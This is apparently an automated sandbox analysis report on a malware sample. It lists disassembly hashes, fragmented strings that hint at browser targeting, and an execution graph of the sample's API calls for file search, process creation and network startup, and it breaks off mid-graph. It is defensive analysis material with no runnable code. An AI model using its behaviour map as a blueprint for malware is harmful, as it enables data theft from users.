                                                      • Opcode ID: 0dae5bc0225a80cddb9af0f6516835a44364a1c7f45211be1a81d3fa31d9ea35
                                                      • Instruction ID: 4d5a379690b98d64854e79b7f2d50a586db24016fc5a78d2dfd5e6188237d8e0
                                                      • Opcode Fuzzy Hash: 0dae5bc0225a80cddb9af0f6516835a44364a1c7f45211be1a81d3fa31d9ea35
                                                      • Instruction Fuzzy Hash: E5718EB5D51718AEDB21EFA4CC40FEEB7BDAF44305F048199E509BA144EB705B488FA1
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.3412088432.0000000002DF0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_2df0000_QEwzeZKCXN.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $.$F$P$e$i$l$m$o$o$r$s$x
                                                      • API String ID: 0-392141074
                                                      • Opcode ID: 28b61d30b9cc5649417410ab66448f61b8dd9d3f237c7d4aeb03625ceb284145
                                                      • Instruction ID: 1b947cd910b82c4e44c4ed2716723331360ffedb3a9cd4a4de2431868778b69e
                                                      • Opcode Fuzzy Hash: 28b61d30b9cc5649417410ab66448f61b8dd9d3f237c7d4aeb03625ceb284145
                                                      • Instruction Fuzzy Hash: 9A716EB5D51718AEDB21EFE4CC80FEEB7B9AF84305F048199E509AA144EB705748CFA1
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.3412088432.0000000002DF0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_2df0000_QEwzeZKCXN.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: D$\$e$e$i$l$n$r$r$w$x
                                                      • API String ID: 0-685823316
                                                      • Opcode ID: 5eaf3f90079cdcebf000d3d2c154770941bdd29a74f49d26791f1eda5db743dc
                                                      • Instruction ID: 50614fc40affe678cb142e8527efbe3b333edca0bf9a09b7535e73dc5856edb8
                                                      • Opcode Fuzzy Hash: 5eaf3f90079cdcebf000d3d2c154770941bdd29a74f49d26791f1eda5db743dc
                                                      • Instruction Fuzzy Hash: FC2180B5D5131CAAEF50DFE4CC44BEEBBB9BF48704F00815CE618BA180DBB556488BA4
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.3412088432.0000000002DF0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_2df0000_QEwzeZKCXN.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: .$P$e$i$m$o$r$x
                                                      • API String ID: 0-620024284
                                                      • Opcode ID: 4ab57f1ea754dbd4f5db381b6358ae88b11920b39e5c08a333428ad5f6716573
                                                      • Instruction ID: d7f50b6789119068ed6142ef45d64b9db9864865c375b217667cbd057f9c30f7
                                                      • Opcode Fuzzy Hash: 4ab57f1ea754dbd4f5db381b6358ae88b11920b39e5c08a333428ad5f6716573
                                                      • Instruction Fuzzy Hash: 7E41B2B9911318B6DB20EFA4CC40FDF777DAF85300F0085DDA509AB141EAB597888FA0
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.3412088432.0000000002DF0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_2df0000_QEwzeZKCXN.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: L$S$\$a$c$e$l
                                                      • API String ID: 0-3322591375
                                                      • Opcode ID: 8fae88fcbe38e7b1764a2d9ef81d7190bcbccc7dc7f45a00362cee2e20064e4f
                                                      • Instruction ID: 893b69c937ae757a28ded53dc5fd6504e09fe0b42576f8b6fbfb2442f5fb84f5
                                                      • Opcode Fuzzy Hash: 8fae88fcbe38e7b1764a2d9ef81d7190bcbccc7dc7f45a00362cee2e20064e4f
                                                      • Instruction Fuzzy Hash: BF4185B6D11318AACB10EFA8DC84FEEB7F9EF89300F05455AD909AB105E7715A45CFA0
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.3412088432.0000000002DF0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_2df0000_QEwzeZKCXN.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $C$EFOX$INTO$L$iNTE$mOZI
                                                      • API String ID: 0-221895023
                                                      • Opcode ID: f6dfa6dfc814f329a14c783fe41b14b2830ee5a843d1686ca99e05bd26b20b24
                                                      • Instruction ID: 4dc872411d25977892d8f0e98bf8c914ff0cebe052c6cc67381b6ad11e327036
                                                      • Opcode Fuzzy Hash: f6dfa6dfc814f329a14c783fe41b14b2830ee5a843d1686ca99e05bd26b20b24
                                                      • Instruction Fuzzy Hash: C411E3B0D0524CABCF10DFE1D6442DEFFB0BB04704F618469D9167B204D7B98A588F85
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.3412088432.0000000002DF0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_2df0000_QEwzeZKCXN.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: F$P$T$f$r$x
                                                      • API String ID: 0-2523166886
                                                      • Opcode ID: a51a0ba0246ca10ffea144acdfa9e8057638e4f25974be456be36518516ab6ed
                                                      • Instruction ID: 101a97469b5fed05be63e66feadfe65a0c3d4329bb3b876ffc47b9bb53abf059
                                                      • Opcode Fuzzy Hash: a51a0ba0246ca10ffea144acdfa9e8057638e4f25974be456be36518516ab6ed
                                                      • Instruction Fuzzy Hash: 7451C7B1A02304AAD735DF64CD44BEFB7F8EF44714F04465DE9096A184E7B49644CB61
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.3412088432.0000000002DF0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_2df0000_QEwzeZKCXN.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $,$7$M$c$y
                                                      • API String ID: 0-1581163936
                                                      • Opcode ID: 04c0d21fef904183fa0c4aa6dcf969caa2ddcf462f3ebf2bb01421a6cd653b26
                                                      • Instruction ID: 56da038edc7b36aaee2b214781e58d302060b51a48e06778427b20cf260c0903
                                                      • Opcode Fuzzy Hash: 04c0d21fef904183fa0c4aa6dcf969caa2ddcf462f3ebf2bb01421a6cd653b26
                                                      • Instruction Fuzzy Hash: 8D11C910D087CEDDDB22CBBC98186AEBF715B23224F0887D9D4F52A2D6D2754706C7A6
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.3412088432.0000000002DF0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_2df0000_QEwzeZKCXN.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $i$l$o$u
                                                      • API String ID: 0-2051669658
                                                      • Opcode ID: ee946bd710f41731977db54ff580f3048da314814155923805e50dbc1a12c2c2
                                                      • Instruction ID: 1cea9c38481db4dcbbff9e98aee9d71c339d4c958f75a676be4b6e30235244e8
                                                      • Opcode Fuzzy Hash: ee946bd710f41731977db54ff580f3048da314814155923805e50dbc1a12c2c2
                                                      • Instruction Fuzzy Hash: 444117B1A01308AFDB60DFA5CC84FEFBBF9AB89700F104559E519AB240D775AA41CB60
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.3412088432.0000000002DF0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_2df0000_QEwzeZKCXN.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $i$l$o$u
                                                      • API String ID: 0-2051669658
                                                      • Opcode ID: 7e3d3780ce6030a60feb8f8bac62e5ff9e7b0b120ff547bd21e5f12c49f9a77d
                                                      • Instruction ID: 2e1205e99781108b97d899c64c441f5086caa9802b6dcff930da02ec0d6dd7d3
                                                      • Opcode Fuzzy Hash: 7e3d3780ce6030a60feb8f8bac62e5ff9e7b0b120ff547bd21e5f12c49f9a77d
                                                      • Instruction Fuzzy Hash: AF413CB5A01308AFDB64DFA4CC80FEFBBF9EB89700F104559E519AB240D775AA41CB60
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.3412088432.0000000002DF0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_2df0000_QEwzeZKCXN.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $e$k$o
                                                      • API String ID: 0-3624523832
                                                      • Opcode ID: 1a1ad6358134188f5eb0b10470ef9bf61befa83f4e1898daaa7416aa3aa2cf88
                                                      • Instruction ID: d5fd3c966e080879db0ebb7f8df8ebfe937cbcdfd0d53eb6519d165e3e2f49e6
                                                      • Opcode Fuzzy Hash: 1a1ad6358134188f5eb0b10470ef9bf61befa83f4e1898daaa7416aa3aa2cf88
                                                      • Instruction Fuzzy Hash: 4AB10CB5A00304ABDB64DBA8CC85FEFB7FDAF88700F148558F61997244D774AA41CBA0
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.3412088432.0000000002DF0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_2df0000_QEwzeZKCXN.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $e$h$o
                                                      • API String ID: 0-3662636641
                                                      • Opcode ID: b070bb9cc113f83761edb10ab38a54e5e10f398db97082f53635b1e82515ae4d
                                                      • Instruction ID: d10dfae1a6ea56df3e0e8ad73cae88e5e293f0ea391285e1c1da71a8e507d3ab
                                                      • Opcode Fuzzy Hash: b070bb9cc113f83761edb10ab38a54e5e10f398db97082f53635b1e82515ae4d
                                                      • Instruction Fuzzy Hash: 668186B6D513186ADB65EB64CC81FEF73BDEF85200F0046DAA509BA044EF745B848FA1
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.3412088432.0000000002DF0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_2df0000_QEwzeZKCXN.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: FALSETRUE$FALSETRUE$TRUE$TRUE
                                                      • API String ID: 0-2877786613
                                                      • Opcode ID: afe719e3ed325c813c6acb98083adb2bd5f31cef9863d3ef1e4a9c1455ac7557
                                                      • Instruction ID: 06fb5bc2ef0b3af3d4619eec4fa03ec6ff727a29f7be03f42a6cc2a76a37f30e
                                                      • Opcode Fuzzy Hash: afe719e3ed325c813c6acb98083adb2bd5f31cef9863d3ef1e4a9c1455ac7557
                                                      • Instruction Fuzzy Hash: BD412FB5A526187AEB11EF90CC41FEF777D9F96600F004149FA047B288EB746A0587B6
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.3412088432.0000000002DF0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_2df0000_QEwzeZKCXN.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: -$0$G$K
                                                      • API String ID: 0-1148822038
                                                      • Opcode ID: a90f588b99e69cdbff2fa5d997e09d350dd073ffeb06fd257243bb37cd5d8b60
                                                      • Instruction ID: 0651810a5937fde0e90fb5ada37a884726c5aa854d8cba5aea410d3653959d04
                                                      • Opcode Fuzzy Hash: a90f588b99e69cdbff2fa5d997e09d350dd073ffeb06fd257243bb37cd5d8b60
                                                      • Instruction Fuzzy Hash: 0A3132B5A11209BBEB14DBA4CC41BEF77B8EF45304F048198F909AA244E775AA048BE5
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.3412088432.0000000002DF0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_2df0000_QEwzeZKCXN.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: DIWA$IWN$y${
                                                      • API String ID: 0-1866221370
                                                      • Opcode ID: 1b4a46deb99e66ce875eeb7d5d470a55aac9136c1b1c598930de182a10a2714e
                                                      • Instruction ID: c9c56e64c2a7a4394f16d432531b073409cc752d95d4abb6ef0881ca5076557f
                                                      • Opcode Fuzzy Hash: 1b4a46deb99e66ce875eeb7d5d470a55aac9136c1b1c598930de182a10a2714e
                                                      • Instruction Fuzzy Hash: 314185B09413889ADB10CF95D9846DEBFB1FB05304FA48498D06A7F202DB328695CF96
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.3412088432.0000000002DF0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_2df0000_QEwzeZKCXN.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $e$k$o
                                                      • API String ID: 0-3624523832
                                                      • Opcode ID: cf1506f26a2e7f8428b90a15cd3bd25994f17c27e2f7372e1c0a2cd716e43bef
                                                      • Instruction ID: c000109811e6b54cbb8844529d8d999ec9fbf182ee0cf72a9630b8a1deecca11
                                                      • Opcode Fuzzy Hash: cf1506f26a2e7f8428b90a15cd3bd25994f17c27e2f7372e1c0a2cd716e43bef
                                                      • Instruction Fuzzy Hash: 5711E9B1901208AFDB14DF94D8C0ADEBBB9FF44314F04925EE915AB105D771D544CBA0
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.3412088432.0000000002DF0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_2df0000_QEwzeZKCXN.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $e$k$o
                                                      • API String ID: 0-3624523832
                                                      • Opcode ID: 5d1e2648f20736ce3e89748f19116fdba4b98686458396e4974cb2111e48625d
                                                      • Instruction ID: a86ae34e513163e0adc4b28bd42ede97bc26af2305155ae65dcb49c8bb385a36
                                                      • Opcode Fuzzy Hash: 5d1e2648f20736ce3e89748f19116fdba4b98686458396e4974cb2111e48625d
                                                      • Instruction Fuzzy Hash: 1B0184B290131CABDB14DF99D884ADEF7B9FF48314F04825DE9196B205EB71D544CBA0

                                                      Execution Graph

                                                      Execution Coverage:2.8%
                                                      Dynamic/Decrypted Code Coverage:0%
                                                      Signature Coverage:2.3%
                                                      Total number of Nodes:439
                                                      Total number of Limit Nodes:70
                                                      execution_graph 80834 30a1889 80835 30a188f 80834->80835 80836 30a18b2 80834->80836 80835->80836 80839 30a1894 80835->80839 80847 30a9190 80836->80847 80838 30a18b9 80842 30a5790 80839->80842 80841 30a18a8 80843 30a57f4 80842->80843 80844 30a582b 80843->80844 80850 30a0fa0 80843->80850 80844->80841 80846 30a580d 80846->80841 80848 30a91aa 80847->80848 80849 30a91bb NtClose 80848->80849 80849->80838 80851 30a0fc3 80850->80851 80853 30a1016 80850->80853 80852 30a101e 80852->80846 80853->80852 80867 30a8ff0 80853->80867 80855 30a1112 80856 30a1130 80855->80856 80857 30a1145 80855->80857 80858 30a9190 NtClose 80856->80858 80859 30a9190 NtClose 80857->80859 80860 30a1139 80858->80860 80861 30a114e 80859->80861 80860->80846 80862 30a1185 80861->80862 80871 30a5ef0 80861->80871 80862->80846 80864 30a1170 80876 30ab260 80864->80876 80868 30a909a 80867->80868 80870 30a901e 80867->80870 80869 30a90b0 NtReadFile 80868->80869 80869->80855 80870->80855 80872 30a5f55 80871->80872 80873 30a5f84 80872->80873 80879 30aafd0 LdrInitializeThunk 80872->80879 80873->80864 80875 30a5f66 80875->80864 80880 30a9500 80876->80880 80878 30a1179 80878->80846 80879->80875 80881 30a951d 80880->80881 80882 30a952e RtlFreeHeap 80881->80882 80882->80878 80883 3099a0c 80885 3099a11 80883->80885 80884 3099a3d 80885->80884 80886 30ab260 RtlFreeHeap 80885->80886 80886->80884 80887 3089a80 80889 3089e8b 80887->80889 80888 308a4ac 80889->80888 80891 30aaec0 80889->80891 80892 30aaee6 80891->80892 80897 3084020 80892->80897 80894 30aaef2 80895 30aaf2b 80894->80895 80900 30a5400 80894->80900 80895->80888 80904 3093010 80897->80904 80899 308402d 80899->80894 80901 30a5462 80900->80901 80903 30a546f 80901->80903 80922 30917f0 80901->80922 80903->80895 80905 309302d 80904->80905 80907 3093046 80905->80907 80908 30a9c00 80905->80908 80907->80899 80910 30a9c1a 80908->80910 80909 30a9c49 80909->80907 80910->80909 80915 30a87c0 80910->80915 80913 30ab260 RtlFreeHeap 80914 30a9cc2 80913->80914 80914->80907 80916 30a87dd 80915->80916 80919 3852c0a 80916->80919 80917 30a8809 80917->80913 80920 3852c11 80919->80920 80921 3852c1f LdrInitializeThunk 80919->80921 80920->80917 80921->80917 80923 309182b 80922->80923 80940 3097c80 80923->80940 80925 3091833 80926 3091b10 80925->80926 80951 30ab340 80925->80951 80926->80903 80928 3091849 80929 30ab340 RtlAllocateHeap 80928->80929 80930 309185a 80929->80930 80931 30ab340 RtlAllocateHeap 80930->80931 80932 309186b 80931->80932 80936 3091907 80932->80936 80962 3096820 NtClose LdrInitializeThunk LdrInitializeThunk 80932->80962 80935 3091abf 80937 3091af9 80935->80937 80938 3091aeb WSAStartup 80935->80938 80954 3094350 80936->80954 80958 30a7d40 80937->80958 80938->80937 80941 3097cac 80940->80941 80963 3097b70 80941->80963 80944 3097cd9 80945 30a9190 NtClose 80944->80945 80948 3097ce4 80944->80948 80945->80948 80946 3097d0d 80946->80925 80947 3097cf1 80947->80946 80949 30a9190 NtClose 80947->80949 80948->80925 80950 3097d03 80949->80950 80950->80925 80974 30a94b0 80951->80974 80953 30ab35b 80953->80928 80955 3094374 80954->80955 80956 30943b0 LdrLoadDll 80955->80956 80957 309437b 80955->80957 80956->80957 80957->80935 80959 30a7da2 80958->80959 80961 30a7daf 80959->80961 80977 3091b20 80959->80977 80961->80926 80962->80936 80964 3097c66 80963->80964 80965 3097b8a 80963->80965 80964->80944 80964->80947 80969 30a8860 80965->80969 80968 30a9190 NtClose 80968->80964 80970 30a887d 80969->80970 80973 38535c0 LdrInitializeThunk 80970->80973 80971 3097c5a 80971->80968 80973->80971 80975 30a94ca 80974->80975 80976 30a94db RtlAllocateHeap 80975->80976 80976->80953 80982 3091b40 80977->80982 80991 3097f50 80977->80991 80979 3092096 80979->80961 80981 3091d54 81000 30ac550 80981->81000 80982->80979 80995 30ac420 80982->80995 80985 3091d69 80987 3091db3 80985->80987 81006 3090670 80985->81006 80987->80979 80988 3090670 LdrInitializeThunk 80987->80988 81009 3097ef0 80987->81009 80988->80987 80989 3091f04 80989->80987 80990 3097ef0 LdrInitializeThunk 80989->80990 80990->80989 80992 3097f5d 80991->80992 80993 3097f7c SetErrorMode 80992->80993 80994 3097f83 80992->80994 80993->80994 80994->80982 80996 30ac430 80995->80996 80997 30ac436 80995->80997 80996->80981 80998 30ab340 RtlAllocateHeap 80997->80998 80999 30ac45c 80998->80999 80999->80981 81002 30ac4c0 81000->81002 81001 30ac51d 81001->80985 81002->81001 81003 30ab340 RtlAllocateHeap 81002->81003 81004 30ac4fa 81003->81004 81005 30ab260 RtlFreeHeap 81004->81005 81005->81001 81013 30a9420 81006->81013 81010 3097f03 81009->81010 81018 30a86c0 81010->81018 81012 3097f2e 81012->80987 81014 30a943a 81013->81014 81017 3852c70 LdrInitializeThunk 81014->81017 81015 3090692 81015->80989 81017->81015 81019 30a8741 81018->81019 81021 30a86ee 81018->81021 81023 3852dd0 LdrInitializeThunk 81019->81023 81020 30a8766 81020->81012 81021->81012 81023->81020 81024 309c3c0 81026 309c3e9 81024->81026 81025 309c4ec 81026->81025 81027 309c490 FindFirstFileW 81026->81027 81027->81025 81029 309c4ab 81027->81029 81028 309c4d3 FindNextFileW 81028->81029 81030 309c4e5 FindClose 81028->81030 81029->81028 81030->81025 81031 30a1900 81035 30a1919 81031->81035 81032 30a1964 81033 30ab260 RtlFreeHeap 81032->81033 81034 30a1974 81033->81034 81035->81032 81036 30a19a4 81035->81036 81038 30a19a9 81035->81038 81037 30ab260 RtlFreeHeap 81036->81037 81037->81038 81039 30a8e80 81040 30a8f3a 81039->81040 81042 30a8eb2 81039->81042 81041 30a8f50 NtCreateFile 81040->81041 81043 3852ad0 LdrInitializeThunk 81044 3097110 81045 309717f 81044->81045 81046 3097128 81044->81046 81046->81045 81048 309b050 81046->81048 81049 309b076 81048->81049 81050 309b2a3 81049->81050 81075 30a9590 81049->81075 81050->81045 81052 309b0e9 81052->81050 81053 30ac550 2 API calls 81052->81053 81054 309b108 81053->81054 81054->81050 81055 309b1dc 81054->81055 81056 30a87c0 LdrInitializeThunk 81054->81056 81058 3095930 LdrInitializeThunk 81055->81058 81059 309b1fb 81055->81059 81057 309b16a 81056->81057 81057->81055 81061 309b173 81057->81061 81058->81059 81063 309b28b 81059->81063 81081 30a8330 81059->81081 81060 309b1c4 81064 3097ef0 LdrInitializeThunk 81060->81064 81061->81050 81061->81060 81062 309b1a2 81061->81062 81078 3095930 81061->81078 81096 30a4580 LdrInitializeThunk 81062->81096 81069 3097ef0 LdrInitializeThunk 81063->81069 81068 309b1d2 81064->81068 81068->81045 81071 309b299 81069->81071 81070 309b262 81086 30a83e0 81070->81086 81071->81045 81073 309b27c 81091 30a8540 81073->81091 81076 30a95ad 81075->81076 81077 30a95be CreateProcessInternalW 81076->81077 81077->81052 81079 309596e 81078->81079 81097 30a8990 81078->81097 81079->81062 81082 30a83b0 81081->81082 81084 30a835e 81081->81084 81103 38539b0 LdrInitializeThunk 81082->81103 81083 30a83d5 81083->81070 81084->81070 81087 30a845d 81086->81087 81089 30a840b 81086->81089 81104 3854340 LdrInitializeThunk 81087->81104 81088 30a8482 81088->81073 81089->81073 81092 30a85bd 81091->81092 81094 30a856b 81091->81094 81105 3852fb0 LdrInitializeThunk 81092->81105 81093 30a85e2 81093->81063 81094->81063 81096->81060 81098 30a89bf 81097->81098 81099 30a8a41 81097->81099 81098->81079 81102 3852d10 LdrInitializeThunk 81099->81102 81100 30a8a86 81100->81079 81102->81100 81103->81083 81104->81088 81105->81093 81106 3096b90 81107 3096bba 81106->81107 81110 3097d20 81107->81110 81109 3096be4 81111 3097d3d 81110->81111 81117 30a88b0 81111->81117 81113 3097d8d 81114 3097d94 81113->81114 81115 30a8990 LdrInitializeThunk 81113->81115 81114->81109 81116 3097dbd 81115->81116 81116->81109 81118 30a894b 81117->81118 81119 30a88db 81117->81119 81122 3852f30 LdrInitializeThunk 81118->81122 81119->81113 81120 30a8984 81120->81113 81122->81120 81123 3090bd0 81124 3090bea 81123->81124 81125 3094350 LdrLoadDll 81124->81125 81126 3090c05 81125->81126 81127 3090c39 PostThreadMessageW 81126->81127 81128 3090c4a 81126->81128 81127->81128 81129 3092f13 81130 3097b70 2 API calls 81129->81130 81131 3092f23 81130->81131 81132 3092f3f 81131->81132 81133 30a9190 NtClose 81131->81133 81133->81132 81146 3089a20 81147 3089a2f 81146->81147 81148 3089a6d 81147->81148 81149 3089a5a CreateThread 81147->81149 81150 309ab20 81155 309a830 81150->81155 81152 309ab2d 81167 309a4b0 81152->81167 81154 309ab49 81156 309a855 81155->81156 81157 309a9a3 81156->81157 81177 30a3190 81156->81177 81157->81152 81159 309a9ba 81159->81152 81160 309a9b1 81160->81159 81162 309aaa7 81160->81162 81192 3099f00 81160->81192 81164 309ab0a 81162->81164 81201 309a270 81162->81201 81165 30ab260 RtlFreeHeap 81164->81165 81166 309ab11 81165->81166 81166->81152 81168 309a4c6 81167->81168 81171 309a4d1 81167->81171 81169 30ab340 RtlAllocateHeap 81168->81169 81169->81171 81170 309a4f2 81170->81154 81171->81170 81173 309a802 81171->81173 81175 3099f00 RtlFreeHeap 81171->81175 81176 309a270 RtlFreeHeap 81171->81176 81172 309a81b 81172->81154 81173->81172 81174 30ab260 RtlFreeHeap 81173->81174 81174->81172 81175->81171 81176->81171 81178 30a319e 81177->81178 81179 30a31a5 81177->81179 81178->81160 81180 3094350 LdrLoadDll 81179->81180 81181 30a31d7 81180->81181 81182 30a31e6 81181->81182 81205 30a2c50 LdrLoadDll 81181->81205 81184 30ab340 RtlAllocateHeap 81182->81184 81188 30a3394 81182->81188 81185 30a31ff 81184->81185 81186 30a338a 81185->81186 81185->81188 81189 30a321b 81185->81189 81187 30ab260 RtlFreeHeap 81186->81187 81186->81188 81187->81188 81188->81160 81189->81188 81190 30ab260 RtlFreeHeap 81189->81190 81191 30a337e 81190->81191 81191->81160 81193 3099f26 81192->81193 81206 309d930 81193->81206 81195 3099f98 81196 309a120 81195->81196 81197 3099fb6 81195->81197 81198 309a105 81196->81198 81199 3099dc0 RtlFreeHeap 81196->81199 81197->81198 81211 3099dc0 81197->81211 81198->81160 81199->81196 81202 309a296 81201->81202 81203 309d930 RtlFreeHeap 81202->81203 81204 309a31d 81203->81204 81204->81162 81205->81182 81208 309d954 81206->81208 81207 309d961 81207->81195 81208->81207 81209 30ab260 RtlFreeHeap 81208->81209 81210 309d9a4 81209->81210 81210->81195 81212 3099ddd 81211->81212 81215 309d9c0 81212->81215 81214 3099ee3 81214->81197 81216 309d9e4 81215->81216 81217 309da8e 81216->81217 81218 30ab260 RtlFreeHeap 81216->81218 81217->81214 81218->81217 81219 309ff20 81220 309ff3d 81219->81220 81221 3094350 LdrLoadDll 81220->81221 81222 309ff58 81221->81222 81223 309f620 81224 309f684 81223->81224 81248 30960c0 81224->81248 81226 309f7be 81227 309f7b7 81227->81226 81255 30961d0 81227->81255 81229 309f963 81230 309f83a 81230->81229 81231 309f972 81230->81231 81259 309f400 81230->81259 81232 30a9190 NtClose 81231->81232 81234 309f97c 81232->81234 81235 309f876 81235->81231 81236 309f881 81235->81236 81237 30ab340 RtlAllocateHeap 81236->81237 81238 309f8aa 81237->81238 81239 309f8c9 81238->81239 81240 309f8b3 81238->81240 81268 309f2f0 CoInitialize 81239->81268 81241 30a9190 NtClose 81240->81241 81243 309f8bd 81241->81243 81244 30a9190 NtClose 81245 309f95c 81244->81245 81247 30ab260 RtlFreeHeap 81245->81247 81246 309f8d7 81246->81244 81247->81229 81249 30960f3 81248->81249 81250 3096117 81249->81250 81271 30a8cf0 81249->81271 81250->81227 81252 30a9190 NtClose 81254 30961ba 81252->81254 81253 309613a 81253->81250 81253->81252 81254->81227 81256 30961f5 81255->81256 81276 30a8ae0 81256->81276 81260 309f41c 81259->81260 81261 3094350 LdrLoadDll 81260->81261 81263 309f437 81261->81263 81262 309f440 81262->81235 81263->81262 81264 3094350 LdrLoadDll 81263->81264 81265 309f50b 81264->81265 81266 3094350 LdrLoadDll 81265->81266 81267 309f568 81265->81267 81266->81267 81267->81235 81270 309f355 81268->81270 81269 309f3eb CoUninitialize 81269->81246 81270->81269 81272 30a8d0d 81271->81272 81275 3852ca0 LdrInitializeThunk 81272->81275 81273 30a8d39 81273->81253 81275->81273 81277 30a8afd 81276->81277 81280 3852c60 LdrInitializeThunk 81277->81280 81278 3096269 81278->81230 81280->81278 81281 3096f30 81282 3096f4c 81281->81282 81285 3096f9f 81281->81285 81284 30a9190 NtClose 81282->81284 81282->81285 81283 30970d7 81286 3096f67 81284->81286 81285->81283 81292 3096350 NtClose LdrInitializeThunk 81285->81292 81291 3096350 NtClose LdrInitializeThunk 81286->81291 81288 30970b1 81288->81283 81293 3096520 NtClose LdrInitializeThunk LdrInitializeThunk 81288->81293 81291->81285 81292->81288 81293->81283 81294 3098170 GetFileAttributesW 81295 3098181 81294->81295 81296 30959b0 81297 3097ef0 LdrInitializeThunk 81296->81297 81299 30959e0 81296->81299 81297->81299 81300 3095a0c 81299->81300 81301 3097e70 81299->81301 81302 3097eb4 81301->81302 81307 3097ed5 81302->81307 81308 30a8490 81302->81308 81304 3097ec5 81305 3097ee1 81304->81305 81306 30a9190 NtClose 81304->81306 81305->81299 81306->81307 81307->81299 81309 30a850d 81308->81309 81311 30a84bb 81308->81311 81313 3854650 LdrInitializeThunk 81309->81313 81310 30a8532 81310->81304 81311->81304 81313->81310 81314 30920b0 81315 30a87c0 LdrInitializeThunk 81314->81315 81316 30920e6 81315->81316 81317 30a8770 81318 30a878a 81317->81318 81321 3852df0 LdrInitializeThunk 81318->81321 81319 30a87b2 81321->81319 81322 30a1570 81323 30a158c 81322->81323 81324 30a15c8 81323->81324 81325 30a15b4 81323->81325 81327 30a9190 NtClose 81324->81327 81326 30a9190 NtClose 81325->81326 81328 30a15bd 81326->81328 81329 30a15d1 81327->81329 81332 30ab380 RtlAllocateHeap 81329->81332 81331 30a15dc 81332->81331 81333 30a85f0 81334 30a8682 81333->81334 81336 30a861e 81333->81336 81338 